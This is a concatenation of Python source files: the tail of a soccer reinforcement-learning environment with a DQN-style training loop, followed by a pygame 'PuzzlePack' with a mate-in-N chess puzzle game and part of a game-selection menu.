        self.y_vel += player_mass*player.y_vel + dely
class Player(Circle):
    """A radius-20 player circle with a capped speed and a team."""

    def __init__(self, center, max_speed, team):
        super().__init__(center, 20)
        # Store the squared cap so move() can compare without sqrt.
        self.max_speed_sq = max_speed**2
        self.prev_pos = center
        self.team = team

    def revert_move(self):
        """Undo the last move (used after a player-player collision)."""
        self.center = self.prev_pos

    def move(self, action):
        """Apply a 'direction key' action (0-3); anything else is a no-op."""
        if action == 0:
            dx, dy = 0, 1
        elif action == 1:
            dx, dy = 1, 0
        elif action == 2:
            dx, dy = 0, -1
        elif action == 3:
            dx, dy = -1, 0
        else:
            dx, dy = 0, 0
        # Check for max speed. Fix: the original read self.vel_x/vel_y,
        # which do not exist (Circle defines x_vel/y_vel), so every move
        # raised AttributeError.
        if ((self.x_vel + dx)**2 + (self.y_vel + dy)**2) \
                <= self.max_speed_sq:
            self.x_vel += dx
            self.y_vel += dy
        self.prev_pos = self.center
        super(Player, self).move()

    def __str__(self):
        return super(Player, self).__str__() + "\nMax Speed: {} \n Team: {}"\
            .format(self.max_speed_sq**.5, self.team)
--- FILE SEPARATOR ---
#Adapted from Pytorch DQN Tutorial:
#https://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html
import Engine
import math
import random
import numpy as np
from itertools import count
# NOTE(review): Engine.make("Naive") returns (None, None) in the visible
# Engine module, so env.reset() below would fail -- confirm the intended
# configuration name.
env, agents = Engine.make("Naive")
num_episodes = 50
for i_episode in range(num_episodes):
    # Initialize the environment and state
    env.reset()
    state = env.screen()
    for t in count():
        actions = []
        for agent in agents:
            # Select and perform an action
            actions.append(agent.select_action(state))
        next_state, rewards, done = env.step(actions)
        # rewards = torch.tensor([rewards], device=device)
        if done:
            next_state = None
        for i in range(len(agents)):
            # Store the transition in memory
            agent = agents[i]
            action = actions[i]
            reward = rewards[i]
            # NOTE(review): `memory` and `optimize_model` are not defined
            # on the visible Agent/NaiveAgent classes -- presumably a DQN
            # agent is expected here; verify before running.
            agent.memory.push(state, action, next_state, reward)
        # Move to the next state
        state = next_state
        for agent in agents:
            # Perform one step of the optimization (on the target network)
            agent.optimize_model(i_episode, done)
        if done:
            break
print('Complete')
env.close()
|
[
"/Agents/Agent.py",
"/Agents/MonteCarloAgent.py",
"/Agents/NaiveAgent.py",
"/Engine.py",
"/ExpSolutions/ExpSolution.py",
"/ExpSolutions/SimpleExp3.py",
"/Main.py",
"/Point.py",
"/Renderer.py",
"/SoccerEnv.py",
"/Training.py"
] |
00tpotter/PuzzlePack
|
# Chess class
import pygame
import time
import sys
import random
import numpy as np
from typing import List
pygame.font.init()
# Board geometry: an 800px window split into 8x8 squares.
WIDTH = 800
squareSize = WIDTH / 8
WHITE = (255, 255, 255)
GREY = (128, 128, 128)
YELLOW = (255, 255, 200)
BLUE = (50, 255, 255)
RED = (255, 0, 0)
BLACK = (0, 0, 0)
PURPLE = (255, 175, 255)
LIGHT_RED = (255, 175, 175)
ORANGE = (255, 200, 145)
# Height in pixels of the header/footer button bars.
SCALE = 50
font = pygame.font.SysFont('timesnewroman.ttc', 48)
small_font = pygame.font.SysFont('consola', 32)
##piece class, passed in a single number from 0 to 13, representing the different pieces.
# None = 0
# King = 1
# Pawn = 2
# Knight = 3
# Bishop = 4
# Rook = 5
# Queen = 6
# The above is for white pieces, for black pieces of the same type add 7.
class Piece:
    """A chess piece.

    Constructed from a code 0-13: 1-6 are white King/Pawn/Knight/Bishop/
    Rook/Queen; add 7 for the black piece of the same type.
    """

    type = 0
    side = 0  # 0 = white, 1 = black
    moved = False
    enPassant = False

    # Shared lookup tables for sprite names and FEN-style letters.
    _NAMES = {1: "King", 2: "Pawn", 3: "Knight", 4: "Bishop", 5: "Rook", 6: "Queen"}
    _LETTERS = {1: "k", 2: "p", 3: "n", 4: "b", 5: "r", 6: "q"}

    def __init__(self, type):
        self.type = type
        if type > 6:
            self.type = type - 7
            self.side = 1
        # Build the sprite path. Renamed the local from `str`, which
        # shadowed the builtin.
        path = "chessImages/"
        if self.side == 0:
            path += "white"
        else:
            path += "black"
        if self.type in Piece._NAMES:
            path += Piece._NAMES[self.type] + ".png"
        self.image = pygame.image.load(path)
        self.image = pygame.transform.scale(self.image, (100, 100))

    # Fix: all of the is* predicates compared the BUILTIN `type` to an
    # int (always False); the instance attribute was intended.
    def isKing(self):
        return self.type == 1

    def isPawn(self):
        return self.type == 2

    def isKnight(self):
        return self.type == 3

    def isBishop(self):
        return self.type == 4

    def isRook(self):
        return self.type == 5

    def isQueen(self):
        return self.type == 6

    def whichSide(self):
        """Return 0 for white, 1 for black."""
        return self.side

    def hasMoved(self):
        """True once this piece has moved (used for castling rights)."""
        return self.moved

    def toString(self):
        """Two-char code like 'wk' (white king), or 'bug' for an invalid type."""
        out = "w" if self.side == 0 else "b"
        if self.type in Piece._LETTERS:
            return out + Piece._LETTERS[self.type]
        return "bug"
def squareToIndex(stringMove):
    """Convert algebraic coordinates like 'e2' to a 0-63 board index.

    Index 0 is a8 (top-left as drawn), 63 is h1. Replaces the original
    eight-branch letter ladder with a single index lookup; as before, an
    unrecognized file letter leaves the file offset at -1.
    """
    file_char = stringMove[0]
    num1 = "abcdefgh".index(file_char) + 1 if file_char in "abcdefgh" else -1
    num2 = (8 - int(stringMove[1])) * 8 - 1
    return num2 + num1
def loadPuzzles():
    """Read cpuzzles.txt: one puzzle per line as comma-separated fields.

    Fix: uses a context manager -- the original never closed the file
    handle. Line endings are kept in the final field, as before.
    """
    with open("cpuzzles.txt", "r") as text:
        return [line.split(',') for line in text]
class Square:
    """One board square: screen position, color, highlight, and piece."""

    occupiedBy = None

    def __init__(self, index):
        self.row = int(index / 8)
        self.col = int(index % 8)
        self.y = int(self.row * squareSize)
        self.x = int(self.col * squareSize)
        # Alternate colors; index 0 (a8) is a light square.
        if (self.row + self.col) % 2 == 0:
            self.color = WHITE
        else:
            self.color = BLACK
        self.hasPiece = False
        self.highlighted = False

    def highlight(self):
        """Mark this square as a legal-move target."""
        self.highlighted = True

    def unhighlight(self):
        self.highlighted = False

    def draw(self, WIN):
        """Blit the square, its piece sprite, and the highlight dot onto WIN."""
        pygame.draw.rect(WIN, self.color, (self.x, self.y + SCALE, squareSize, squareSize))
        if self.hasPiece:
            WIN.blit(self.occupiedBy.image, (self.x, self.y + SCALE))
        if self.highlighted:
            pygame.draw.circle(WIN, GREY, (self.x + squareSize/2, self.y + squareSize/2 + SCALE), 15)

    def placePiece(self, piece):
        """Put `piece` on this square.

        Fix: the parameter was named `Piece`, shadowing the Piece class.
        """
        self.occupiedBy = piece
        self.hasPiece = True

    def movePiece(self):
        """Empty this square."""
        self.occupiedBy = None
        self.hasPiece = False
class Board:
    """The 64 squares of a chess board plus FEN position loading."""

    def __init__(self):
        # Fix: the original declared `board` as a CLASS attribute, so
        # every Board instance shared the same square objects; it is now
        # built per instance. Attribute access by callers is unchanged.
        self.board: List[Square] = [Square(i) for i in range(64)]

    def printBoard(self):
        """Dump the board to stdout for debugging."""
        for square in self.board:
            if square.hasPiece == False:
                print("[ ]", end='')
            else:
                print("[", square.occupiedBy.toString(), "]", sep='', end='')
            if (square.col == 7):
                print()

    def positionFromFen(self, fen):
        """Place pieces from `fen`; return [turn, C1, C2, C3, C4, enPassant].

        turn is 0 (white) or 1 (black) to move; C1..C4 are the K/Q/k/q
        castling rights; enPassant is a 0-63 target index or -1.
        Exits the program on an unrecognized piece character, as before.
        """
        pos = 0
        first = fen.index(" ")
        second = fen.index(" ", first + 1)
        third = fen.index(" ", second + 1)
        turn = 0
        C1 = C2 = C3 = C4 = False
        enPassant = -1
        # FEN letter -> Piece code (a black piece is its white code + 7);
        # replaces the original twelve-branch elif ladder.
        codes = {'p': 9, 'k': 8, 'q': 13, 'b': 11, 'n': 10, 'r': 12,
                 'P': 2, 'K': 1, 'Q': 6, 'B': 4, 'R': 5, 'N': 3}
        for i in range(first):
            x = fen[i]
            if x.isdigit():
                # A digit skips that many empty squares.
                pos += int(x)
            elif x == '/':
                continue
            elif x in codes:
                self.board[pos].placePiece(Piece(codes[x]))
                pos = pos + 1
            else:
                print("invalid FEN")
                pygame.quit()
                sys.exit()
        if fen[first + 1] == 'b':
            turn = 1
        for i in range(second + 1, third):
            if fen[i] == 'K':
                C1 = True
            if fen[i] == 'Q':
                C2 = True
            if fen[i] == 'k':
                C3 = True
            if fen[i] == 'q':
                C4 = True
        if fen[third + 1] != '-':
            # Reuse the module-level converter instead of duplicating its
            # letter/rank arithmetic inline (same formula as before).
            enPassant = squareToIndex(fen[third + 1:third + 3])
        return [turn, C1, C2, C3, C4, enPassant]
class Chess:
    """Mate-in-N chess puzzle game driven by pygame.

    Squares are indexed 0-63 from a8 (0) across to h1 (63). The player's
    moves are validated against each puzzle's scripted solution line; a
    wrong move ends the run.
    """

    def selectPiece(self, B, index):
        """Return the candidate-move list for the piece on `index` of board B."""
        piece = B.board[index].occupiedBy
        if piece.type == 2:
            if piece.side == 0:
                return self.pawn_moves_w(B, index)
            else:
                return self.pawn_moves_b(B, index)
        elif piece.type == 1:
            return self.king_moves(B, index)
        elif piece.type == 3:
            return self.knight_moves(B, index)
        elif piece.type == 4:
            return self.bishop_moves(B, index)
        elif piece.type == 5:
            return self.rook_moves(B, index)
        elif piece.type == 6:
            return self.queen_moves(B, index)

    def pawn_moves_w(self, B, index):
        """Moves for a white pawn (white moves toward index 0).

        NOTE(review): the +-7/+-9 capture offsets and the en-passant
        checks do not guard against file wrap-around at the a/h edges,
        and the double advance does not check the intermediate square --
        confirm the puzzle set never exposes these.
        """
        moves = []
        if index >= 8:
            if B.board[index - 8].hasPiece == False:
                moves.append(index - 8)
        if index >= 16:
            # Double advance only from the starting rank (row 6).
            if (B.board[index - 16].hasPiece == False and int(index / 8) == 6):
                moves.append(index - 16)
        if index >= 7:
            if B.board[index-7].hasPiece:
                if B.board[index - 7].occupiedBy.side == 1:
                    moves.append(index - 7)
        if index >= 9:
            if B.board[index-9].hasPiece:
                if B.board[index - 9].occupiedBy.side == 1:
                    moves.append(index - 9)
        # En passant from the 5th rank (indices 24-31).
        if (index < 31 and index > 23):
            if B.board[index + 1].hasPiece:
                if B.board[index + 1].occupiedBy.side == 1 and B.board[index + 1].occupiedBy.enPassant:
                    moves.append(index - 7)
        if (index < 32 and index > 24):
            if B.board[index - 1].hasPiece:
                if B.board[index - 1].occupiedBy.side == 1 and B.board[index - 1].occupiedBy.enPassant:
                    moves.append(index - 9)
        return moves

    def pawn_moves_b(self, B, index):
        """Moves for a black pawn (black moves toward index 63).

        NOTE(review): same edge-wrap / intermediate-square caveats as
        pawn_moves_w.
        """
        moves = []
        if index <= 55:
            if B.board[index + 8].hasPiece == False:
                moves.append(index + 8)
        if index <= 47:
            if (B.board[index + 16].hasPiece == False and int(index / 8) == 1):
                moves.append(index + 16)
        if index <= 56:
            if B.board[index+7].hasPiece:
                if B.board[index + 7].occupiedBy.side == 0:
                    moves.append(index + 7)
        if index <= 54:
            if B.board[index+9].hasPiece:
                if B.board[index + 9].occupiedBy.side == 0:
                    moves.append(index + 9)
        # En passant from the 4th rank (indices 32-39).
        if (index < 39 and index > 31):
            if B.board[index + 1].hasPiece:
                if B.board[index + 1].occupiedBy.side == 0 and B.board[index + 1].occupiedBy.enPassant:
                    moves.append(index + 9)
        if (index < 40 and index > 32):
            if B.board[index - 1].hasPiece:
                if B.board[index - 1].occupiedBy.side == 0 and B.board[index - 1].occupiedBy.enPassant:
                    moves.append(index + 7)
        return moves

    def knight_moves(self, B, index):
        """All L-shaped knight destinations (x^2 + y^2 == 5 offsets)."""
        moves = []
        side = B.board[index].occupiedBy.side
        i = int(index / 8)
        j = index % 8
        for x in range(-2, 3):
            for y in range(-2, 3):
                if x ** 2 + y ** 2 == 5:
                    if self.on_board((x + i, y + j)):
                        if B.board[index + 8*x + y].hasPiece == False:
                            moves.append(index + x*8 + y)
                        elif B.board[index + 8*x + y].occupiedBy.side != side:
                            moves.append(index + x*8 + y)
        return moves

    def bishop_moves(self, B, index):
        """Slide along the four diagonals, stopping at the first piece."""
        moves = []
        side = B.board[index].occupiedBy.side
        i = int(index / 8)
        j = index % 8
        diagonals = [[[i + x, j + x] for x in range(1, 8)],
                     [[i + x, j - x] for x in range(1, 8)],
                     [[i - x, j + x] for x in range(1, 8)],
                     [[i - x, j - x] for x in range(1, 8)]]
        for direction in diagonals:
            for position in direction:
                if self.on_board(position):
                    posIndex = position[0] * 8 + position[1]
                    if B.board[posIndex].hasPiece == False:
                        moves.append(posIndex)
                    elif B.board[posIndex].occupiedBy.side != side:
                        # Capture square: include it, then stop sliding.
                        moves.append(posIndex)
                        break
                    else:
                        break
        return moves

    def rook_moves(self, B, index):
        """Slide along rank and file, stopping at the first piece."""
        moves = []
        side = B.board[index].occupiedBy.side
        i = int(index / 8)
        j = index % 8
        columns = [[[i + x, j] for x in range(1, 8 - i)],
                   [[i - x, j] for x in range(1, 1 + i)],
                   [[i, j + x] for x in range(1, 8 - j)],
                   [[i, j - x] for x in range(1, 1 + j)]]
        for direction in columns:
            for position in direction:
                if self.on_board(position):
                    posIndex = position[0] * 8 + position[1]
                    if B.board[posIndex].hasPiece == False:
                        moves.append(posIndex)
                    elif B.board[posIndex].occupiedBy.side != side:
                        moves.append(posIndex)
                        break
                    else:
                        break
        return moves

    def queen_moves(self, B, index):
        """Queen = bishop moves plus rook moves."""
        m1 = self.bishop_moves(B, index)
        m2 = self.rook_moves(B, index)
        for i in m2:
            m1.append(i)
        return m1

    def king_moves(self, B, index):
        """One-square king steps plus castling destinations.

        NOTE(review): the castling checks verify only empty squares and
        unmoved rook/king -- not that the king passes through or lands on
        an attacked square; confirm the puzzle lines avoid this.
        """
        moves = []
        side = B.board[index].occupiedBy.side
        i = int(index / 8)
        j = index % 8
        pairs = [[i-1, j-1], [i-1, j], [i-1, j+1], [i, j-1],
                 [i, j+1], [i+1, j-1], [i+1, j], [i+1, j+1]]
        for position in pairs:
            if self.on_board(position):
                posIndex = position[0] * 8 + position[1]
                if B.board[posIndex].hasPiece == False:
                    moves.append(posIndex)
                elif B.board[posIndex].occupiedBy.side != side:
                    moves.append(posIndex)
        king = B.board[index].occupiedBy
        # White castling: king-side to 62, queen-side to 58.
        if king.side == 0:
            if king.hasMoved() == False and B.board[63].hasPiece:
                if B.board[61].hasPiece == False and B.board[62].hasPiece == False and B.board[63].occupiedBy.hasMoved() == False:
                    moves.append(62)
            if king.hasMoved() == False and B.board[56].hasPiece:
                if B.board[59].hasPiece == False and B.board[58].hasPiece == False and B.board[57].hasPiece == False and B.board[56].occupiedBy.hasMoved() == False:
                    moves.append(58)
        # Black castling: king-side to 6, queen-side to 2.
        if king.side == 1:
            if king.hasMoved() == False and B.board[7].hasPiece:
                if B.board[5].hasPiece == False and B.board[6].hasPiece == False and B.board[7].occupiedBy.hasMoved() == False:
                    moves.append(6)
            if king.hasMoved() == False and B.board[0].hasPiece:
                if B.board[3].hasPiece == False and B.board[2].hasPiece == False and B.board[1].hasPiece == False and B.board[0].occupiedBy.hasMoved() == False:
                    moves.append(2)
        return moves

    def on_board(self, position):
        """True if (row, col) lies within the 8x8 board."""
        if position[0] > 7 or position[0] < 0 or position[1] > 7 or position[1] < 0:
            return False
        return True

    def highlight_squares(self, B, moves):
        """Show the move-target dot on every square in `moves`."""
        for i in moves:
            B.board[i].highlight()

    def unhighlight_squares(self, B, moves):
        """Clear the move-target dot from every square in `moves`."""
        for i in moves:
            B.board[i].unhighlight()

    def update_display(self, win, Board, score, winIn):
        """Redraw the board, the header buttons/score, and the footer menu bar."""
        for square in Board.board:
            square.draw(win)
        text1 = font.render("Score: " + str(score), True, RED)
        text2 = font.render("Find mate in " + str(winIn), True, RED)
        rect1 = text1.get_rect()
        rect1.center = (200, 25)
        rect2 = text2.get_rect()
        rect2.center = (600, 25)
        win.blit(text1, rect1)
        win.blit(text2, rect2)
        # Buttons
        # New game button
        new = small_font.render("NEW GAME", True, BLACK, LIGHT_RED)
        newRect = new.get_rect()
        newRect.center = (WIDTH // 6, SCALE // 2)
        pygame.draw.rect(win, LIGHT_RED, [0, 0, WIDTH // 3, SCALE])
        win.blit(new, newRect)
        # Timer
        timer = small_font.render("Score: " + str(score), True, BLACK, ORANGE)
        timerRect = timer.get_rect()
        timerRect.center = (3 * (WIDTH // 6), SCALE // 2)
        pygame.draw.rect(win, ORANGE, [WIDTH // 3, 0, WIDTH // 3, SCALE])
        win.blit(timer, timerRect)
        # Mate in
        mate = small_font.render("Mate in: " + str(winIn), True, BLACK, YELLOW)
        mateRect = mate.get_rect()
        mateRect.center = (5 * (WIDTH // 6), SCALE // 2)
        pygame.draw.rect(win, YELLOW, [2 * (WIDTH // 3), 0, WIDTH // 3, SCALE])
        win.blit(mate, mateRect)
        # Back to menu button
        menu = small_font.render("BACK TO MENU", True, BLACK, PURPLE)
        menuRect = menu.get_rect()
        menuRect.center = (WIDTH // 2, (17 * SCALE) + (SCALE // 2))
        pygame.draw.rect(win, PURPLE, [0, 17 * SCALE, WIDTH, SCALE])
        win.blit(menu, menuRect)
        pygame.display.update()

    def findNode(self, pos):
        """Convert a mouse (x, y) position into a 0-63 board index."""
        x,y = pos
        row = (y - SCALE) // squareSize
        col = x // squareSize
        return int(row)*8 + int(col)

    def playGame(self):
        """Main puzzle loop: 30 shuffled puzzles, validated move by move.

        NOTE(review): the `temp1`-`temp3` ranges cover indices 0-18,
        20-38 and 40-58 (19 each, skipping 19/39/59) -- confirm against
        the puzzle file's difficulty bands. Also note the recursive
        self.playGame() calls at the bottom and on the NEW GAME button:
        each replay deepens the call stack.
        """
        score_file = open("chess_high_score.txt", "r")
        score = score_file.read().splitlines()  # read in the best time/high score
        score_file.close()
        pygame.init()
        WIN = pygame.display.set_mode((WIDTH,WIDTH + (SCALE*2)))
        pygame.display.set_caption("Chess")
        B = Board()
        counter = -1
        puzzles = loadPuzzles()
        temp1 = list(range(0, 19))
        temp2 = list(range(20,39))
        temp3 = list(range(40,59))
        random.shuffle(temp1)
        random.shuffle(temp2)
        random.shuffle(temp3)
        # Ten puzzles from each difficulty band.
        temp = temp1[0:10] + temp2[0:10] + temp3[0:10]
        for puzzleNum in temp:
            winIn = 3
            if counter < 9:
                winIn = 2
            counter += 1
            # Clear the board, then load the puzzle's FEN position.
            for sq in B.board:
                sq.movePiece()
            fen = puzzles[puzzleNum][0]
            [t, c1, c2, c3, c4, ep] = B.positionFromFen(fen)
            # Lost castling rights are modeled as "rook already moved".
            if (c1 == False):
                if B.board[63].hasPiece:
                    B.board[63].occupiedBy.moved = True
            if (c2 == False):
                if B.board[56].hasPiece:
                    B.board[56].occupiedBy.moved = True
            if (c3 == False):
                if B.board[7].hasPiece:
                    B.board[7].occupiedBy.moved = True
            if (c4 == False):
                if B.board[0].hasPiece:
                    B.board[0].occupiedBy.moved = True
            if ep != -1:
                B.board[ep].occupiedBy.enPassant = True
            # B.printBoard()
            moveNum = t
            correct = True
            moves = []
            selected = False
            selectedSquare = -1
            # The scripted solution line; odd entries are the computer's replies.
            moveList = puzzles[puzzleNum][1:]
            for move in range(len(moveList)):
                computerMove = False
                if move % 2 == 1:
                    computerMove = True
                wholeMove = moveList[move]
                move1 = wholeMove[0:2]
                move2 = wholeMove[2:4]
                m1 = squareToIndex(move1)
                m2 = squareToIndex(move2)
                moveNotMade = True
                while moveNotMade:
                    pygame.time.delay(25)
                    for event in pygame.event.get():
                        if event.type == pygame.QUIT:
                            pygame.quit()
                            sys.exit()
                        if computerMove:
                            # Animate the scripted reply with two pauses.
                            pygame.time.delay(500)
                            moves = self.selectPiece(B, m1)
                            self.highlight_squares(B, moves)
                            self.update_display(WIN, B, counter, winIn)
                            pygame.time.delay(500)
                            piece = B.board[m1].occupiedBy
                            B.board[m2].placePiece(piece)
                            B.board[m1].movePiece()
                            self.unhighlight_squares(B, moves)
                            self.update_display(WIN, B, counter, winIn)
                            moveNotMade = False
                            moveNum += 1
                            break
                        if event.type == pygame.MOUSEBUTTONDOWN:
                            pos = pygame.mouse.get_pos()
                            tempCol = pos[0] // squareSize
                            tempRow = (pos[1] - SCALE) // squareSize
                            if (tempCol < 8 and tempCol >= 0) and (tempRow < 8 and tempRow >= 0):
                                sq = self.findNode(pos)
                                if selected == False:
                                    # First click: pick up a piece of the side to move.
                                    if B.board[sq].hasPiece:
                                        piece = B.board[sq].occupiedBy
                                        if (piece.side == moveNum % 2):
                                            moves = self.selectPiece(B, sq)
                                            self.highlight_squares(B, moves)
                                            selectedSquare = sq
                                            selected = True
                                        else:
                                            print("It is not your turn!")
                                    else:
                                        print("No piece here")
                                else:
                                    # Second click: try to drop on a legal square.
                                    choseMove = False
                                    for i in moves:
                                        if i == sq:
                                            piece = B.board[selectedSquare].occupiedBy
                                            # Any legal move that is not the scripted one fails the puzzle.
                                            if sq != m2 or selectedSquare != m1:
                                                print("game over!")
                                                moveNotMade = False
                                                correct = False
                                                break
                                            if piece.type == 2:
                                                # Pawn double-step arms en passant; a
                                                # diagonal move to an empty square IS en passant.
                                                if (abs(selectedSquare - sq) == 16):
                                                    piece.enPassant = True
                                                elif abs(selectedSquare - sq) != 8:
                                                    if B.board[sq].hasPiece == False:
                                                        if piece.side == 0:
                                                            B.board[sq + 8].occupiedBy = None
                                                            B.board[sq + 8].hasPiece = False
                                                        else:
                                                            B.board[sq - 8].occupiedBy = None
                                                            B.board[sq - 8].hasPiece = False
                                            if piece.type == 1:
                                                # King moved two files: relocate the rook too.
                                                if (selectedSquare - sq == -2):
                                                    rook = B.board[selectedSquare + 3].occupiedBy
                                                    B.board[selectedSquare + 1].placePiece(rook)
                                                    B.board[selectedSquare + 3].movePiece()
                                                if (selectedSquare - sq == 2):
                                                    rook = B.board[selectedSquare - 4].occupiedBy
                                                    B.board[selectedSquare - 1].placePiece(rook)
                                                    B.board[selectedSquare - 4].movePiece()
                                            B.board[sq].placePiece(piece)
                                            B.board[selectedSquare].movePiece()
                                            selectedSquare = -1
                                            selected = False
                                            self.unhighlight_squares(B, moves)
                                            moves = []
                                            moveNum += 1
                                            moveNotMade = False
                                            choseMove = True
                                            piece.moved = True
                                            # En passant rights last exactly one ply.
                                            for s in B.board:
                                                if s.occupiedBy != None:
                                                    if s.occupiedBy.type == 2 and s.occupiedBy.side == moveNum % 2:
                                                        s.occupiedBy.enPassant = False
                                    if correct == False:
                                        break
                                    if choseMove == False:
                                        # Clicked a non-target square: re-select from there.
                                        self.unhighlight_squares(B, moves)
                                        moves = []
                                        if B.board[sq].hasPiece:
                                            piece = B.board[sq].occupiedBy
                                            if (piece.side == moveNum % 2):
                                                moves = self.selectPiece(B, sq)
                                                self.highlight_squares(B, moves)
                                                selectedSquare = sq
                                                selected = True
                                            else:
                                                print("It is not your turn!")
                                        else:
                                            print("No piece here")
                                    else:
                                        choseMove = False
                            else:
                                # Click outside the board: header/footer buttons.
                                # New game button
                                if (pos[0] < WIDTH // 3 and pos[0] >= 0) and (pos[1] < SCALE and pos[1] >= 0):
                                    self.playGame()
                                # Back to menu button
                                # NOTE(review): this region spans everything below
                                # the header bar, not just the footer -- confirm.
                                if (pos[0] < WIDTH and pos[0] >= 0) and (pos[1] < WIDTH + (SCALE*2) and pos[1] >= 1 * SCALE):
                                    return
                    self.update_display(WIN, B, counter, winIn)
                    if correct == False:
                        break
                if correct == False:
                    break
            if correct:
                print("correct")
            else:
                break
        # Run over: show the game-over screen and the final/high score.
        font = pygame.font.SysFont('timesnewroman.ttc', 100)
        text = font.render("Game Over!", True, RED)
        rect = text.get_rect()
        rect.center = (WIDTH / 2, WIDTH / 2)
        WIN.blit(text, rect)
        font = pygame.font.SysFont('timesnewroman.ttc', 48)
        test7 = " "
        if counter > int(score[0]):
            test7 = "New high score: " + str(counter)
            with open("chess_high_score.txt", "w") as out:
                out.write("{}\n".format(str(counter)))
                # NOTE(review): score_file was already closed above; this
                # re-close is redundant (harmless) -- confirm intent.
                score_file.close()
        else:
            test7 = "Final score: " + str(counter)
        text2 = font.render(test7, True, RED)
        rect2 = text2.get_rect()
        rect2.center = (WIDTH / 2, WIDTH / 2 + 100)
        WIN.blit(text2, rect2)
        pygame.display.update()
        pygame.time.delay(3000)
        self.playGame()
--- FILE SEPARATOR ---
# Test suite for the chess game
--- FILE SEPARATOR ---
# Menu class
import word_search
import chess
import sudoku
import minesweeper
import pygame
class Menu:
    def __init__(self):
        """Eagerly build one instance of every puzzle game for the menu.

        NOTE(review): each constructor runs immediately (WordSearch reads
        words.txt, Minesweeper builds a random board), so importing/creating
        the menu does real work up front.
        """
        self.ws_game = word_search.WordSearch()
        self.chess_game = chess.Chess()
        self.sudoku_game = sudoku.Sudoku()
        self.ms_game = minesweeper.Minesweeper()
def printClass(self):
print("This is the menu class.")
    def playWordSearch(self):
        """Run the word search game."""
        self.ws_game.playGame()
    def playSudoku(self):
        """Run the sudoku game."""
        self.sudoku_game.playGame()
    def playMinesweeper(self):
        """Run the minesweeper game."""
        self.ms_game.playGame()
    def playChess(self):
        """Run the chess game."""
        self.chess_game.playGame()
    def chooseGame(self):
        """Show the main menu window and dispatch to the selected game.

        A button click only latches a playX flag and restyles the button;
        the game itself is launched on the next non-click event, and the
        menu window/caption are rebuilt when the game returns.
        """
        # Pygame initializations
        pygame.init()
        pygame.display.set_caption('Puzzle Pack')
        scale = 50
        width = scale * 15
        height = scale * 10
        twiceS = scale * 2
        halfS = scale // 2
        quarterS = scale // 4
        halfW = width // 2
        quarterW = width // 4
        eighthW = width // 8
        quartH = height // 4
        eighthH = height // 8
        running = True
        frames = 0
        screen = pygame.display.set_mode((width, height))
        clock = pygame.time.Clock()
        font = pygame.font.SysFont("lato", 32)
        small_font = pygame.font.SysFont("lato", 24)
        # Colors
        white = (255, 255, 255)
        grey = (200, 200, 200)
        dark_grey = (175, 175, 175)
        black = (0, 0, 0)
        light_red = (255, 175, 175)
        dark_red = (230, 150, 150)
        light_orange = (255, 200, 145)
        light_yellow = (255, 255, 200)
        light_green = (200, 255, 200)
        light_blue = (200, 200, 255)
        dark_blue = (175, 175, 230)
        light_purple = (255, 175, 255)
        light_pink = (255, 200, 200)
        light_brown = (200, 150, 100)
        # Color effects for each button
        playSud = False
        sudText = white
        sudBack = black
        sudBorder = 0
        playWord = False
        wordText = white
        wordBack = black
        wordBorder = 0
        playMine = False
        mineText = white
        mineBack = black
        mineBorder = 0
        playCh = False
        chText = white
        chBack = black
        chBorder = 0
        textColor = white
        backColor = black
        border = 0
        image = pygame.image.load("PuzzlePack1.png")
        # image = pygame.transform.scale(image, (400, 400))
        while running:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    running = False
                elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
                    # User clicks the mouse. Get the position
                    pos = pygame.mouse.get_pos()
                    x = pos[0]
                    y = pos[1]
                    # Sudoku button pressed
                    if (x <= scale * 14 and x >= scale * 10) and (y >= scale + quarterS and y <= scale * 3 - quarterS):
                        sudText = black
                        sudBack = white
                        sudBorder = 2
                        playSud = True
                    # Word Search button pressed
                    if (x <= scale * 14 and x >= scale * 10) and (y >= scale * 3 + quarterS and y <= scale * 5 - quarterS):
                        wordText = black
                        wordBack = white
                        wordBorder = 2
                        playWord = True
                    # Minesweeper button pressed
                    if (x <= scale * 14 and x >= scale * 10) and (y >= scale * 5 + quarterS and y <= scale * 7 - quarterS):
                        mineText = black
                        mineBack = white
                        mineBorder = 2
                        playMine = True
                    # Chess button pressed
                    if (x <= scale * 14 and x >= scale * 10) and (y >= scale * 7 + quarterS and y <= scale * 9 - quarterS):
                        chText = black
                        chBack = white
                        chBorder = 2
                        playCh = True
                # Reset visual changes in button clicks
                else:
                    sudText = white
                    sudBack = black
                    sudBorder = 0
                    if playSud:
                        self.playSudoku()
                        pygame.display.set_caption('Puzzle Pack')
                        screen = pygame.display.set_mode((width, height))
                    playSud = False
                    wordText = white
                    wordBack = black
                    wordBorder = 0
                    if playWord:
                        self.playWordSearch()
                        pygame.display.set_caption('Puzzle Pack')
                        screen = pygame.display.set_mode((width, height))
                    playWord = False
                    mineText = white
                    mineBack = black
                    mineBorder = 0
                    if playMine:
                        self.playMinesweeper()
                        pygame.display.set_caption('Puzzle Pack')
                        screen = pygame.display.set_mode((width, height))
                    playMine = False
                    chText = white
                    chBack = black
                    chBorder = 0
                    if playCh:
                        self.playChess()
                        pygame.display.set_caption('Puzzle Pack')
                        screen = pygame.display.set_mode((width, height))
                    playCh = False
                    # NOTE(review): frames/tick/update also run once per
                    # non-click event here, in addition to once per frame
                    # below — the loop can tick more than 60x/s worth of
                    # waits when many events arrive.
                    frames += 1
                    clock.tick(60)
                    pygame.display.update()
            # Displaying everything on the screen
            screen.fill(white)
            screen.blit(image, (0, 0))
            # Sudoku button
            sud = font.render("SUDOKU", True, sudText, sudBack)
            sudRect = sud.get_rect()
            sudRect.center = (scale * 12, scale * 2)
            pygame.draw.rect(screen, black, [scale * 10, scale + quarterS, scale * 4, scale * 2 - halfS], sudBorder)
            screen.blit(sud, sudRect)
            # Word search button
            word = font.render("WORD SEARCH", True, wordText, wordBack)
            wordRect = word.get_rect()
            wordRect.center = (scale * 12, scale * 4)
            pygame.draw.rect(screen, black, [scale * 10, scale * 3 + quarterS, scale * 4, scale * 2 - halfS], wordBorder)
            screen.blit(word, wordRect)
            # Minesweeper button
            mine = font.render("MINESWEEPER", True, mineText, mineBack)
            mineRect = mine.get_rect()
            mineRect.center = (scale * 12, scale * 6)
            pygame.draw.rect(screen, black, [scale * 10, scale * 5 + quarterS, scale * 4, scale * 2 - halfS], mineBorder)
            screen.blit(mine, mineRect)
            # Chess puzzle button
            ch = font.render("CHESS", True, chText, chBack)
            chRect = ch.get_rect()
            chRect.center = (scale * 12, scale * 8)
